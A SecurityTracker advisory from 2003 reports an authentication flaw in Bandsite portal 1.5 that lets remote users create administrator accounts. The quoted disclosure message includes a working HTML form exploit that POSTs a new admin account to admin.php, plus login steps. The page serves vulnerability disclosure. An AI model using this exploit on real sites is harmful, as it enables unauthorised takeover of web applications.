SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com





Category:   Application (Forum/Board/Portal)  >   Bandsite Vendors:   de Vos, Jelle
Bandsite Portal Software Authentication Flaw Lets Remote Users Add Administrators
SecurityTracker Alert ID:  1007690
SecurityTracker URL:  http://securitytracker.com/id/1007690
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 12 2003
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.5
Description:   Nasser.M.Sh reported a vulnerability in Bandsite. A remote user can gain administrative access on the application.

It is reported that a remote user can submit a specially crafted POST request to the following URL to add a user account that will have administrator privileges on the application:

http://[target]/bandwebsite/admin.php?&Login=1&section=admins

The vendor has reportedly been notified without response.
Impact:   A remote user can add administrative user accounts.
Solution:   No solution was available at the time of this entry.
Vendor URL:  membres.lycos.fr/fluxx/bandwebsite.php (Links to External Site)
Cause:   Authentication error
Underlying OS:   Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.

 Source Message Contents
Date:  Fri, 12 Sep 2003 03:46:46 -0700 (PDT)
Subject:  vulnerability in Bandsite Allows Gaining Admin Access.



Informations :
°°°°°°°°°°°°°°
- Product : Bandsite portal system
- Website : http://membres.lycos.fr/fluxx/bandwebsite.php
- Author  : Jelle de Vos
- Tested version :1.5
- Problem : vulnerability in Bandsite Allows Gaining Admin Access.

Product Description :
°°°°°°°°°°°°°°°°°°°°°
Bandsite is an online portal system designed for Bands. Features: themes
support, news posting, audio sections, guestbook, tour guide, an admin
section to manage overall data and configurations, and more.

Exploits :
°°°°°°°°°°
=====================   nmsh.htm    ==============================
       <TABLE cellSpacing=1 cellPadding=5 width=570 bgColor=#665E6B border=0>
         <TBODY>
         <tr><td bgcolor=#ffffff>
&nbsp;</p>
<p>
<form
action=http://[target]/bandwebsite/admin.php?&Login=1&section=admins
method=post>
    Name:<br>
<input type=text name='name' value='nmsh' size="20"><br>
    Pass:<br>
<input type=text name='pass' value='nmsh' size="20"><br>
<input type=submit name='submit' value='send'><br>
</form></TD></TR></TBODY></TABLE>
<P><BR></P></TD></TR></TBODY></TABLE></BODY>
=====================    nmsh.htm   ==============================
The admin has been added!
:(
now go to this link :
http://[target]/bandwebsite/login.php
and login as admin
name : nmsh
pass : nmsh
Vendor:
°°°°°°°
Vendor has been contacted, no reply received.

Provided by :
°°°°°°°°°°°°°
Nasser.M.Sh
nmsh_sa(at)yahoo.com

------------------------------------------------------------------------
Do you Yahoo!?
Yahoo! SiteBuilder
<http://us.rd.yahoo.com/evt=10469/*http://sitebuilder.yahoo.com> - Free,
easy-to-use web site design software


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us

Copyright 2012, SecurityGlobal.net LLC